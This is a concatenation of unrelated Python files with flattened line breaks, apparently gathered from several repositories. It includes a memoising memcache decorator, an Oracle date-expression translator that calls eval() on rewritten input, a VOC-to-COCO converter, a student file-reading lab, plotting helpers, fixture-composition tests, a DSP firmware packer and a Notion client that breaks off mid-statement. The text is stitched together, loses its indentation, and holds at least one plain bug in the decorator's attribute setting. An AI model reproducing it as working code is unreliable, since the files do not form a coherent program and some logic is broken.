fn): @wraps(fn) def wrapper(*args, **kwargs): key = self.key(fn, args, kwargs) if self.mc: # Try and get the value from memcache if self.invalidate and self.update: output = self.value else: output = (not self.invalidate) and self.get_cache(key) exist = True if output is None: exist = False # Otherwise get the value from # the function/method output = self.call_function(fn, args, kwargs) if self.update or not exist: if output is None: set_value = memcache_none() else: set_value = output self.set_cache(key, set_value) if output.__class__ is memcache_none: # Because not-found keys return # a None value, we use the # memcache_none stub class to # detect these, and make a # distinction between them and # actual None values output = None if self.set: # Set an attribute of the parent # instance/class to the output value, # this can help when other code # accesses attribures directly, or you # want to pickle the instance set_attr = getattr(fn.__class__, self.set) set_attr = output else: # No memcache client instance available, just # return the output of the method output = self.call_function(fn, args, kwargs) return output return wrapper def call_function(self, fn, args, kwargs): return fn(*args, **kwargs) def key(self, fn, args, kwargs): # Get a list of arguement names from the func_code # attribute on the function/method instance, so we can # test for the presence of self or cls, as decorator # wrapped instances lose frame and no longer contain a # reference to their parent instance/class within this # frame func_code = compat.get_function_code(fn) argnames = func_code.co_varnames[:func_code.co_argcount] method = False static = False if len(argnames) > 0: if argnames[0] == 'self' or argnames[0] == 'cls': method = True if argnames[0] == 'cls': static = True arg_values_hash = [] # Grab all the keyworded and non-keyworded arguements so # that we can use them in the hashed memcache key for i, v in sorted(itertools.chain(compat.izip(argnames, args), compat.iteritems(kwargs))): if i != 'self': if i != 'cls': arg_values_hash.append("%s=%s" % (i, v)) class_name = None if method: keys = [] if len(self.parent_keys) > 0: for key in self.parent_keys: keys.append("%s=%s" % (key, getattr(args[0], key))) keys = ','.join(keys) if static: # Get the class name from the cls argument class_name = args[0].__name__ else: # Get the class name from the self argument class_name = args[0].__class__.__name__ module_name = inspect.getmodule(args[0]).__name__ parent_name = "%s.%s[%s]::" % (module_name, class_name, keys) else: # Function passed in, use the module name as the # parent parent_name = inspect.getmodule(fn).__name__ # Create a unique hash of the function/method call key = "%s%s(%s)" % (parent_name, fn.__name__, ",".join(arg_values_hash)) key = key.encode('utf8') if isinstance(key, compat.text_type) else key key = md5(key).hexdigest() return key def get_cache(self, key): return self.mc.get(key) def set_cache(self, key, value): if self.ttl is not None: self.mc.set(key, value, time=self.ttl) else: self.mc.set(key, value) class memcache_none: """Stub class for storing None values in memcache, so we can distinguish between None values and not-found entries. """ pass if __name__ == '__main__': # Run unit tests from memorised import tests tests.run() import re import datetime as dt from dateutil.relativedelta import relativedelta """ Oracle 存储过程转义器 author: zhangjinwei 功能: 将常见的oracle if 条件判断式中的条件里的公式,转化成python语言,来在python里进行布尔判断 oracle 函数如to_date等,需要在本页自定义,可自由扩展 to_char(trunc(sysdate - 60, 'MM'), 'yyyymmdd') >= '20200111' 转换成 to_char(trunc(dt.datetime.now() + relativedelta(days=int(-60)), 'mm'), 'yyyymmdd') >= '20200111' """ def to_date(string: str, pattern: str): string, pattern = string.lower(), pattern.lower() pattern = pattern.replace('yyyy', '%Y') pattern = pattern.replace('yy', '%y') pattern = pattern.replace('mm', '%m') pattern = pattern.replace('dd', '%d') date = dt.datetime.strptime(string, pattern) return date def to_char(date_time, pattern): pattern = pattern.lower() pattern = pattern.replace('yyyy', '%Y') pattern = pattern.replace('yy', '%y') pattern = pattern.replace('mm', '%m') pattern = pattern.replace('dd', '%d') date_string = dt.datetime.strftime(date_time, pattern) return date_string def add_months(date_time, mon_number): assert int(mon_number) == mon_number, '与Oracle不同,本函数只支持整数加减,本次入参( %s )' % str(mon_number) return date_time + relativedelta(months=int(mon_number)) def trunc(date_time, pattern): pattern = pattern.upper() if pattern == 'D': return dt.date(date_time.year, date_time.month, date_time.day) elif pattern in ('M', 'MONTH', 'MM'): return dt.date(date_time.year, date_time.month, 1) def sign_transform(string): """Oracle 符号转换函数, 目的是转换日期加减格式到python格式""" pattern1 = re.compile(r'(?:to_date|date)', re.IGNORECASE) # 处理日期转换 pattern2 = re.compile(r'([-+]) *(\d*)\b,') # 处理加减日期法 pattern3 = re.compile(r'(\bdate\b\s*?)(\'.*?\')', re.IGNORECASE) pattern4 = re.compile(r'([a-zA-Z0-9_ ]+)(=)([a-zA-Z0-9_ ]+)') # 找单个的等号 searched1, searched2, searched3, searched4 = pattern1.search(string), pattern2.search(string), pattern3.search(string), pattern4.search(string) if searched4: string = re.sub(pattern4, r'\1==\3', string) if searched1 and searched2: days = ''.join(searched2.groups()) # 提取加减日期数 string = re.sub(pattern2, '+ relativedelta(days=int(%s)),' % days, string) # 拼接成python能计算的日期加减公式 if searched3: dt_str = searched3.group(2).replace('-', '').replace('\\', '') string = re.sub(pattern3, "to_date(%s, 'yyyymmdd')" % dt_str, string) string = string.replace('sysdate', 'dt.datetime.now()') return string def if_analyser(string): """调用python的eval函数计算True false""" trans = sign_transform(string.strip().lower()) # print('if_analyser>>', trans) boool = eval(trans) boool = 1 if boool else 0 return boool if __name__ == '__main__': s = "to_char(trunc(sysdate - 60, 'MM'), 'yyyymmdd') >= '20200111'" result = if_analyser(s) print(result) from dataset_converters.ConverterBase import ConverterBase import json import os import xmltodict import cv2 labels = [ 'background', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor', ] class VOC2COCOConverter(ConverterBase): formats = ['VOC2COCO'] def __init__(self, copy_fn): ConverterBase.__init__(self, copy_fn) def _get_hw(self, image_path): return cv2.imread(image_path).shape[:2] def _get_segm(self, bbox): x, y, w, h = bbox segm = [[x, y, x + w, y, x + w, y + h, x, y + h]] return segm def _read_filenames(self, file): with open(file, 'r') as f: return [x.replace('\n', '') for x in f.readlines()] def _read_bbox(self, name, input_folder): annotations_folder = os.path.join(input_folder, 'Annotations') annotation_file = os.path.join(annotations_folder, name + '.xml') anno = {} with open(annotation_file, 'rb') as f: anno = xmltodict.parse(f) bboxes = [] areas = [] lbls = [] objects = anno['annotation']['object'] if not isinstance(objects, list): objects = [objects] for object in objects: name = object['name'] lbls.append(labels.index(name)) bbox_dict = object['bndbox'] xmin = int(bbox_dict['xmin']) ymin = int(bbox_dict['ymin']) xmax = int(bbox_dict['xmax']) ymax = int(bbox_dict['ymax']) width, height = xmax - xmin, ymax - ymin bbox = xmin, ymin, width, height bboxes.append(bbox) areas.append(width * height) return bboxes, areas, lbls def _process_images(self, names, input_folder, images_folder, output_images_folder, output_annotations_file): self._ensure_folder_exists_and_is_clear(output_images_folder) to_dump = {'images': [], 'type': 'instances', 'annotations': [], 'categories': []} instance_counter = 1 for i, name in enumerate(names): image_name = name + '.jpg' full_image_name = os.path.join(images_folder, image_name) h, w = self._get_hw(full_image_name) to_dump['images'].append( { 'file_name': image_name, 'height': h, 'width': w, 'id': i + 1 } ) bboxes, areas, lbls = self._read_bbox(name, input_folder) for bbox, area, label in zip(bboxes, areas, lbls): segm = self._get_segm(bbox) to_dump['annotations'].append( { 'segmentation': segm, 'area': area, 'iscrowd': 0, 'image_id': i + 1, 'bbox': bbox, 'category_id': label, 'id': instance_counter, 'ignore': 0 } ) instance_counter += 1 self.copy(full_image_name, output_images_folder) for i, label in enumerate(labels): if i == 0: continue to_dump['categories'].append({'supercategory': 'none', 'id': i, 'name': label}) with open(output_annotations_file, 'w') as f: json.dump(to_dump, f) def _run(self, input_folder, output_folder, FORMAT): images_folder = os.path.join(input_folder, 'JPEGImages') train_images = self._read_filenames(os.path.join(input_folder, 'ImageSets', 'Main', 'train.txt')) val_images = self._read_filenames(os.path.join(input_folder, 'ImageSets', 'Main', 'val.txt')) annotations_folder = os.path.join(output_folder, 'annotations') self._ensure_folder_exists_and_is_clear(output_folder) self._ensure_folder_exists_and_is_clear(annotations_folder) self._process_images(val_images, input_folder, images_folder, os.path.join(output_folder, 'val'), os.path.join(annotations_folder, 'val.json')) self._process_images(train_images, input_folder, images_folder, os.path.join(output_folder, 'train'), os.path.join(annotations_folder, 'train.json')) import numpy as np import pandas as pd import torch import multiprocessing print('Cpu count =', multiprocessing.cpu_count()) a = np.array([1, 2, 3]) df = pd.DataFrame(a) device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') print('Using device:', device) print() #Additional Info when using cuda if device.type == 'cuda': print(torch.cuda.get_device_name(0)) print('Memory Usage:') print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB') print('Cached: ', round(torch.cuda.memory_cached(0)/1024**3,1), 'GB') week10/lab10/weather.py #This file is completed by partner work for lab 10 part 1 and 2 #Author #Author #partI #readlines() def main1(): myFile = open('rainfall.txt','r') accumulator = 0 myFileList = myFile.readlines() minimum = 100 maximum = 0 for lst in myFileList: temperatureList = lst.split() temperature = float(temperatureList[1]) if temperature < minimum: minimum = temperature if temperature > maximum: maximum = temperature accumulator += temperature lstAverage = accumulator / len(myFileList) print('average =',lstAverage,',minimum =',minimum,',maximum =', maximum) main1() #forloop def main2(): myFile = open('rainfall.txt','r') accumulator = 0 accu = 0 for lst in myFile: accu += 1 temperatureList = lst.split() accumulator += float(temperatureList[1]) lstAverage = accumulator / accu print(lstAverage) main2() #readline() def main3(): myFile = open('rainfall.txt','r') accu = 0 tempaccumulator = 0 minimum = 100 maximum = 0 temperature = 0 line = myFile.readline() while line: print(line) line_list = line.split() print(line_list[1]) temp = float(line_list[1]) if temp < minimum: minimum = temp if temp > maximum: maximum = temp tempaccumulator += temp accu += 1 line = myFile.readline() averageTemp = tempaccumulator / accu print('average =',averageTemp,',minimum =',minimum,',maximum =', maximum) #read() def main4(): accu = 0 tempaccumulator = 0 minimum = 100 maximum = 0 temperature = 0 myFile = open('rainfall.txt','r') temp_acc = -0 giant_string = myFile.read() giant_list = giant_string.split("\n") for line in giant_list: if line: line_list = line.split() temp = float(line_list[1]) if temp < minimum: minimum = temp if temp > maximum: maximum = temp tempaccumulator += temp accu += 1 else: break averageTemp = tempaccumulator / accu print('average =',averageTemp,',minimum =',minimum,',maximum =', maximum) main4() #partII def main5(): myFile = open('conversion.txt','w') myFile.write('Fahrenheit Celcius\n') for i in range(-300,213): tempF = i tempC = (5/9)*(i-32) myFile.write('%10.2f %10.2f\n' % (tempF, tempC)) myFile.close() myFile = open('conversion.txt','r') main5() 1-10 from math import log10 import numpy as np from matplotlib.gridspec import GridSpec from matplotlib.ticker import Formatter, NullFormatter, EngFormatter from mpl_toolkits.axes_grid1 import make_axes_locatable SINGLE_SUBPLOT_SPEC = GridSpec(1, 1).new_subplotspec((0, 0), 1, 1) class PrintFirstHalfFormatter(Formatter): ''' A custom formatter which uses a NullFormatter for some labels and delegates to another formatter for others. ''' def __init__(self, other, maxVal=5): self.__other = other self.__null = NullFormatter() self.__max = log10(maxVal) def __call__(self, x, pos=None): func = self.__other if self.shouldShow(x) else self.__null return func(x, pos) def shouldShow(self, x): return log10(x) % 1 <= self.__max def configureFreqAxisFormatting(axes): ''' Configures the x axis of the supplied axes to render Frequency values in a log format. :param axes: ''' hzFormatter = EngFormatter(places=0) axes.get_xaxis().set_major_formatter(hzFormatter) axes.get_xaxis().set_minor_formatter(PrintFirstHalfFormatter(hzFormatter)) def format_axes_dbfs_hz(axes): ''' Applies formatting applicable to a dbFS vs Hz line chart. :param axes: the axes to format. ''' axes.set_xlim(left=20, right=20000) axes.grid(linestyle='-', which='major') axes.grid(linestyle='--', which='minor') axes.set_ylabel('dBFS') axes.set_xlabel('Hz') def calculate_dBFS_Scales(data, max_range=60, vmax_to_round=True): ''' Calculates the min/max in the data and returns the steps to use when displaying lines on a chart, this uses -2 for the first 12 and then -6 thereafter. :param data: the data. :param max_range: the max range. :return: max, min, steps, fillSteps ''' vmax = np.math.ceil(np.nanmax(data)) # coerce max to a round value if vmax_to_round: multiple = 5 if max_range <= 30 else 10 if vmax % multiple != 0: vmax = (vmax - vmax % multiple) + multiple vmin = vmax - max_range steps = np.sort(np.concatenate((np.arange(vmax, vmax - 14, -2), np.arange(vmax - 18, vmin - 6, -6)))) fillSteps = np.sort(np.arange(vmax, vmin, -0.05)) return vmax, vmin, steps, fillSteps def set_y_limits(axes, dBRange): ''' Updates the decibel range on the chart. :param axes: the axes. :param dBRange: the new range. ''' if axes is not None: ylim = axes.get_ylim() axes.set_ylim(bottom=ylim[1] - dBRange, top=ylim[1]) def colorbar(mappable, **kwargs): ''' Creates a colour bar for a given plot that will exist at a specific position relative to the given chart. :param mappable: the plot. :param **kwargs: passed through to colorbar. :return: the colorbar. ''' ax = mappable.ax fig = ax.figure divider = make_axes_locatable(ax) cax = divider.append_axes("right", size="5%", pad=0.05) return fig.colorbar(mappable, cax=cax, **kwargs) 0 # Copyright (C) 2009 - 2016 Open Microscopy Environment: # - Board of Regents of the University of Wisconsin-Madison # - Glencoe Software, Inc. # - University of Dundee # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. import logging from ome.modeltools import config from ome.modeltools import language from ome.modeltools.exceptions import ModelProcessingError class OMEModelEntity(object): """ An abstract root class for properties and model objects containing common type resolution and text processing functionality. """ def resolveLangTypeFromSimpleType(self, simpleTypeName): getSimpleType = self.model.getTopLevelSimpleType while True: simpleType = getSimpleType(simpleTypeName) if simpleType is None: logging.debug("No simpleType found with name: %s" % simpleTypeName) # Handle cases where the simple type is prefixed by # a namespace definition. (ex. OME:LSID). namespaceless = simpleTypeName.split(':')[-1] if namespaceless != simpleTypeName: simpleTypeName = namespaceless continue break logging.debug("%s simpleType dump: %s" % (self, simpleType.__dict__)) # It's possible the simpleType is a union of other # simpleTypes so we need to handle that. We assume # that all the unioned simpleTypes are of the same # base type (ex. "xsd:string" or "xsd:float"). if simpleType.unionOf: union = getSimpleType(simpleType.unionOf[0]) if self.model.opts.lang.hasType(union.getBase()): return self.model.opts.lang.type(union.getBase()) else: simpleTypeName = union.getBase() if self.model.opts.lang.hasType(simpleType.getBase()): return self.model.opts.lang.type(simpleType.getBase()) else: simpleTypeName = simpleType.getBase() # TODO: The above logic looks wrong. simpleTypeName is # asigned but not used and then nothing is returned. def lowerCasePrefix(self, v): if v is None: raise ModelProcessingError( 'Cannot lower case %s on %s' % (v, self.name)) match = config.PREFIX_CASE_REGEX.match(v) if match is None: raise ModelProcessingError( 'No prefix match for %s on %s' % (v, self.name)) prefix, = [_f for _f in match.groups() if _f] return prefix.lower() + v[len(prefix):] def _get_argumentName(self): argumentName = config.REF_REGEX.sub('', self.name) argumentName = self.lowerCasePrefix(argumentName) if isinstance(self.model.opts.lang, language.CXX): if (argumentName == "namespace"): argumentName = "namespace_" elif (argumentName == "union"): argumentName = "union_" return argumentName argumentName = property( _get_argumentName, doc="""The property's argument name (camelCase).""") def _get_methodName(self): try: name = config.BACK_REFERENCE_NAME_OVERRIDE[self.key] return name[0].upper() + name[1:] except (KeyError, AttributeError): pass return config.BACKREF_REGEX.sub( '', config.REF_REGEX.sub('', self.name)) methodName = property( _get_methodName, doc="""The property's method name.""") def _get_isGlobal(self): isGlobal = self._isGlobal try: if self.isBackReference: ref = self.model.getObjectByName( config.BACKREF_REGEX.sub('', self.type)) if ref.name == self.name: return isGlobal return isGlobal or ref.isGlobal except AttributeError: pass if self.isReference: ref = self.model.getObjectByName( config.REF_REGEX.sub('', self.type)) if ref.name == self.name: return isGlobal isGlobal = isGlobal or ref.isGlobal return isGlobal isGlobal = property( _get_isGlobal, doc="""Whether or not the model object is an OMERO system type.""") def _get_isManyToMany(self): try: if self.isBackReference: reference_to = self.model.getObjectByName(self.type) for prop in reference_to.properties.values(): if prop.type == self.parent.name + 'Ref': return prop.isManyToMany except AttributeError: pass return self.manyToMany isManyToMany = property( _get_isManyToMany, doc="""Whether or not the entity is a many-to-many reference.""") def _get_isSettings(self): return self.name.endswith('Settings') isSettings = property( _get_isSettings, doc="""Whether or not the entity is a Settings reference.""") notebooks/_solutions/case2_observations_processing11.py (survey_data_decoupled .groupby("year") .size() .plot(kind='barh', color="#00007f", figsize=(10, 10)))N = int(input()) t = N * 108 // 100 if t < 206: print('Yay!') elif t == 206: print('so-so') elif t > 206: print(':(') keepertech/kt.testing1-10 """\ Tests for kt.testing test fixture composition. These tests use ``nose`` used for handling tests; something different will be needed to ensure we work with other test runners. """ import kt.testing import kt.testing.tests class FixtureUsingBaseClass(kt.testing.FixtureComponent): """Test fixture component derived from provided base class.""" def __init__(self, testcase): super(FixtureUsingBaseClass, self).__init__(testcase) testcase.record.append((self.test, 'derived init')) def setup(self): super(FixtureUsingBaseClass, self).setup() self.test.record.append((self.test, 'derived setup')) self.test.addCleanup( lambda: self.test.record.append((self.test, 'derived cleanup'))) def teardown(self): super(FixtureUsingBaseClass, self).teardown() self.test.record.append((self.test, 'derived teardown')) class IndependentFixture(object): """Test fixture component not using provided base class.""" def __init__(self, testcase, state=42): self.test = testcase testcase.record.append((self.test, 'independent init')) self.state = state def setup(self): self.test.record.append((self.test, 'independent setup')) self.test.addCleanup( lambda: self.test.record.append((self.test, 'independent cleanup'))) def teardown(self): self.test.record.append((self.test, 'independent teardown')) def complain(self, msg): self.test.record.append((self.test, 'independent complaint: %s' % msg)) raise AssertionError('using independent class: %s' % msg) class FixtureWithoutTeardown(object): def __init__(self, testcase): self.test = testcase testcase.record.append((self.test, 'teardownless init')) def setup(self): self.test.record.append((self.test, 'teardownless setup')) self.test.addCleanup( lambda: self.test.record.append((self.test, 'teardownless cleanup'))) class TestComposition(kt.testing.tests.Core): def test_simple_usage(self): self.check_simple_usage(kt.testing.TestCase) def test_simple_usage_derived(self): class TC(kt.testing.TestCase): pass self.check_simple_usage(TC) def test_simple_usage_overridden_new(self): class AlternateBase(object): def __new__(cls, *args, **kwargs): rv = object.__new__(cls) rv.alternate_base = True return rv class MagicTC(kt.testing.TestCase, AlternateBase): pass class DerivedTC(MagicTC): def runTest(self): """Just a dummy.""" # Make sure our special __new__ was invoked. tc = DerivedTC() assert tc.alternate_base self.check_simple_usage(MagicTC) def check_simple_usage(self, baseclass): class TC(baseclass): usingbase = kt.testing.compose(FixtureUsingBaseClass) independent = kt.testing.compose(IndependentFixture) record = [] def test_this(self): self.record.append((self, 'test_this')) def test_the_other(self): self.record.append((self, 'test_the_other')) # Rely on tests being sorted in alphabetical order by method name. tto, tt = self.loader.makeTest(TC) tto_tc = tto tt_tc = tt self.run_one_case(tto) tto_record = [msg for tc, msg in TC.record if tc is tto_tc] tt_record = [msg for tc, msg in TC.record if tc is tt_tc] assert tto_record == [ 'derived init', 'independent init', 'derived setup', 'independent setup', 'test_the_other', # # Note the intermixing of teardown and cleanups; the # teardowns for the fixture components are handled as # teardowns for the test itself. # 'independent teardown', 'independent cleanup', 'derived teardown', 'derived cleanup', ] # The fixture components have already been created for test_this # as well, but the setup methods haven't been called: assert tt_record == [ 'derived init', 'independent init', ] self.run_one_case(tt) tt_record = [msg for tc, msg in TC.record if tc is tt_tc] assert tt_record == [ 'derived init', 'independent init', 'derived setup', 'independent setup', 'test_this', 'independent teardown', 'independent cleanup', 'derived teardown', 'derived cleanup', ] def test_inherited_fixture_components(self): class TCOne(kt.testing.TestCase): usingbase = kt.testing.compose(FixtureUsingBaseClass) class TCTwo(TCOne): independent = kt.testing.compose(IndependentFixture) record = [] def test_this(self): self.record.append((self, 'test_this')) tt, = self.loader.makeTest(TCTwo) self.run_one_case(tt) tt_record = [msg for tc, msg in TCTwo.record] assert tt_record == [ 'derived init', 'independent init', 'derived setup', 'independent setup', 'test_this', 'independent teardown', 'independent cleanup', 'derived teardown', 'derived cleanup', ] def test_case_can_use_fixture_api(self): class TC(kt.testing.TestCase): fixture = kt.testing.compose(IndependentFixture) record = [] def test_this(self): self.record.append((self, 'test_this')) self.state = self.fixture.state self.fixture.complain('bleh') tt, = self.loader.makeTest(TC) result = self.run_one_case(tt) tt_record = [msg for tc, msg in TC.record] assert tt.state == tt.fixture.state assert tt_record == [ 'independent init', 'independent setup', 'test_this', 'independent complaint: bleh', 'independent teardown', 'independent cleanup', ] (xtc, err), = result.failures assert xtc is tt assert err.startswith('Traceback (most recent call last):') assert 'using independent class: bleh' in err def test_fixture_components_construction_args(self): class TC(kt.testing.TestCase): fixture = kt.testing.compose(IndependentFixture, 24) self.check_fixture_components_construction(TC) def test_fixture_components_construction_kwargs(self): class TC(kt.testing.TestCase): fixture = kt.testing.compose(IndependentFixture, state=24) self.check_fixture_components_construction(TC) def check_fixture_components_construction(self, cls): class TC(cls): record = [] def test_this(self): self.state = self.fixture.state tt, = self.loader.makeTest(TC) self.run_one_case(tt) assert tt.state == 24 # If the fixture component doesn't have a teardown method, it isn't # added to the cleanup list. def test_fixture_without_teardown(self): class TC(kt.testing.TestCase): fixture = kt.testing.compose(FixtureWithoutTeardown) record = [] def test_this(self): self.record.append((self, 'test_this')) tt, = self.loader.makeTest(TC) self.run_one_case(tt) tt_record = [msg for tc, msg in TC.record] assert tt_record == [ 'teardownless init', 'teardownless setup', 'test_this', 'teardownless cleanup', ] # Overriding a fixture component property doesn't make the component # inaccessible; aliases for component properties work just fine. def test_component_property_alias(self): class TCBase(kt.testing.TestCase): fixture = kt.testing.compose(IndependentFixture, state='original') class TC(TCBase): orig = TCBase.fixture fixture = kt.testing.compose(IndependentFixture, state='override') record = [] def test_this(self): """Just a dummy.""" tc, = self.loader.makeTest(TC) assert tc.orig.state == 'original' assert tc.fixture.state == 'override' def test_inherited_cooperative_setup(self): """\ Co-operative setup is supported when appropriate bases are omitted. We do this because it's really important that our setUp method is invoked, so it should be drop-dead easy. """ class TCBase(kt.testing.TestCase): # No fixture composition here. def setUp(self): super(TCBase, self).setUp() self.record.append((self, 'TCBase setup')) class TC(TCBase): fixture = kt.testing.compose(FixtureWithoutTeardown) record = [] def test_this(self): self.record.append((self, 'test_this')) tt, = self.loader.makeTest(TC) self.run_one_case(tt) tt_record = [msg for tc, msg in TC.record] assert tt_record == [ 'teardownless init', 'teardownless setup', 'TCBase setup', 'test_this', 'teardownless cleanup', ] 1-10 import os import sys elfFileName = sys.argv[1] baseName = os.path.basename(elfFileName) projectName = os.path.splitext(baseName)[0] # print("projectName",projectName) def writeNum(numString,size): hexString = "0x" + numString hexNum = int(hexString, 16) hexBytes = hexNum.to_bytes(size, byteorder='little', signed=False) dspFile.write(hexBytes); def writeHexNum(hexNum, size): hexBytes = hexNum.to_bytes(size, byteorder='little', signed=False) dspFile.write(hexBytes); def stringToNum(numString): hexString = "0x" + numString num = int(hexString, 16) return num def getOffsetData(line): line = line.strip() line = line.replace('@','') # print(line) x = line.split(" ") offset = stringToNum(x[0]) data = stringToNum(x[1]) return offset, data def padZeros(num,size): zeroString = "0" # print(num,size) if(num > 0): for x in range(num): writeNum(zeroString,size) dspFile = open("dsp_mem.bin", "wb") pmemFile = elfFileName+".PMEM" # print("pmemFile",pmemFile) size = os.path.getsize(pmemFile) # print(size) pmemCount = 0 if(size > 0): file1 = open(pmemFile, 'r') file1.readline() offset, data = getOffsetData(file1.readline()) padZeros(offset, 1) pmemCount = offset file1 = open(pmemFile, 'r') file1.readline() Lines = file1.readlines() # if(Lines[0] != ""): # # print("Valid pmem file") for line in Lines: offset, data = getOffsetData(line) diff = offset - pmemCount padZeros(diff, 4) writeHexNum(data,4) pmemCount = pmemCount + diff + 1 # print(pmemCount) file1.close() else: writeHexNum(0,4) pmemCount = 1 # print("pmemCount:",pmemCount) xmemFile = elfFileName+".XMEM" size = os.path.getsize(xmemFile) # print(size) xmemCount = 0 if(size > 0): file1 = open(xmemFile, 'r') offset, data = getOffsetData(file1.readline()) padZeros(offset, 1) xmemCount = offset file1.seek(0) Lines = file1.readlines() # print(Lines[0]) # if(Lines[0] != ""): # print("Valid xmem file") for line in Lines: offset, data = getOffsetData(line) diff = offset - xmemCount padZeros(diff, 1) writeHexNum(data,1) xmemCount = xmemCount + diff + 1 # print(xmemCount) file1.close() else: writeHexNum(0,2) xmemCount = 2 padding = xmemCount%2 padZeros(padding, 1) xmemCount = xmemCount + padding # print("xmemCount:",xmemCount) ymemFile = elfFileName+".YMEM" size = os.path.getsize(ymemFile) # print(size) ymemCount = 0 if(size > 0): file1 = open(ymemFile, 'r') offset, data = getOffsetData(file1.readline()) padZeros(offset, 1) ymemCount = offset file1.seek(0) Lines = file1.readlines() # print(Lines[0]) # if(Lines[0] != ""): # print("Valid ymem file") for line in Lines: offset, data = getOffsetData(line) diff = offset - ymemCount padZeros(diff, 1) writeHexNum(data,1) ymemCount = ymemCount + diff + 1 # print(ymemCount) file1.close() else: writeHexNum(0,2) ymemCount = 2 padding = ymemCount%2 padZeros(padding, 1) ymemCount = ymemCount + padding # print("ymemCount:",ymemCount) xmemCount = xmemCount >> 1; ymemCount = ymemCount >> 1; dspFile.close() file1.close() # searchLine = "" # configFile = os.path.dirname(elfFileName) + "/../../config.h" # name = "#define CONFIG_DSP_FW_START " # address_start = 0 # with open(configFile, "r") as myfile: # for line in myfile: # if name in line: # searchLine = line # break # if searchLine: # address_split = searchLine.split() # address_start = int(address_split[2], 16) # else: # print("ERROR CONFIG_DSP_FW_START not found in config.h file") # exit(0) startingAddress = 0 # print("stringAddress", hex(startingAddress)) # projectName = "hello_world" dspFile = open("dsp_padded.bin", "wb") stringAddress = startingAddress + 28 writeHexNum(stringAddress,4) writeHexNum(pmemCount,4) writeHexNum(xmemCount,4) writeHexNum(ymemCount,4) stringLength = len(projectName) + 1 pmemAddress = stringAddress + stringLength xmemAddress = pmemAddress + pmemCount * 4 ymemAddress = xmemAddress + xmemCount * 2 # print("pmemAddress",hex(pmemAddress)) # print("xmemAddress",hex(xmemAddress)) # print("ymemAddress",hex(ymemAddress)) writeHexNum(pmemAddress,4) writeHexNum(xmemAddress,4) writeHexNum(ymemAddress,4) dspFile.write(projectName.encode('utf-8')) padZeros(1,1) dspFile.close() # print("pmemCount",pmemCount) # print("xmemCount",xmemCount) # print("ymemCount",ymemCount) with open("dsp_fw.bin", "wb") as myfile, open("dsp_padded.bin", "rb") as file2, open("dsp_mem.bin", "rb") as file3: myfile.write(file2.read()) myfile.write(file3.read()) myfile.close() file2.close()notion_client/client.py """Synchronous and asynchronous clients for Notion's API.""" import logging from abc import abstractclassmethod from dataclasses import dataclass from types import TracebackType from typing import Any, Dict, List, Optional, Type, Union import httpx from httpx import Request, Response from notion_client.api_endpoints import ( BlocksEndpoint, DatabasesEndpoint, PagesEndpoint, SearchEndpoint, UsersEndpoint, ) from notion_client.errors import ( APIResponseError, HTTPResponseError, RequestTimeoutError, is_api_error_code, ) from notion_client.logging import make_console_logger from notion_client.typing import SyncAsync @dataclass class ClientOptions: """Options to configure the client. Attributes: auth: Bearer token for authentication. If left undefined, the `auth` parameter should be set on each request. timeout_ms: Number of milliseconds to wait before emitting a `RequestTimeoutError`. base_url: The root URL for sending API requests. This can be changed to test with a mock server. log_level: Verbosity of logs the instance will produce. By default, logs are written to `stdout`. logger: A custom logger. notion_version: Notion version to use. """ auth: Optional[str] = None timeout_ms: int = 60_000 base_url: str = "https://api.notion.com" log_level: int = logging.WARNING logger: Optional[logging.Logger] = None notion_version: str = "2021-08-16" class BaseClient: def __init__( self, client: Union[httpx.Client, httpx.AsyncClient], options: Optional[Union[Dict[str, Any], ClientOptions]] = None, **kwargs: Any, ) -> None: if options is None: options = ClientOptions(**kwargs) elif isinstance(options, dict): options = ClientOptions(**options) self.logger = options.logger or make_console_logger() self.logger.setLevel(options.log_level) self.options = options self._clients: List[Union[httpx.Client, httpx.AsyncClient]] = [] self.client = client self.blocks = BlocksEndpoint(self) self.databases = DatabasesEndpoint(self) self.users = UsersEndpoint(self) self.pages = PagesEndpoint(self) self.search = SearchEndpoint(self) @property def client(self) -> Union[httpx.Client, httpx.AsyncClient]: return self._clients[-1] @client.setter def client(self, client: Union[httpx.Client, httpx.AsyncClient]) -> None: client.base_url = httpx.URL(self.options.base_url + "/v1/") client.timeout = httpx.Timeout(timeout=self.options.timeout_ms / 1_000) client.headers = httpx.Headers( { "Notion-Version": self.options.notion_version, "User-Agent": "ramnes/notion-sdk-py@0.7.1", } ) if self.options.auth: client.headers["Authorization"] = f"Bearer {self.options.auth}" self._clients.append(client) def _build_request( self, method: str, path: str, query: Optional[Dict[Any, Any]] = None, body: Optional[Dict[Any, Any]] = None, auth: Optional[str] = None, ) -> Request: headers = httpx.Headers() if auth: headers["Authorization"] = f"Bearer {auth}" self.logger.info(f"{method} {self.client.base_url}{path}") self.logger.debug(f"=> {query} -- {body}") return self.client.build_request( method, path, params=query, json=body, headers=headers ) def _parse_response(self, response: Response) -> Any: try: response.raise_for_status() except httpx.TimeoutException: raise 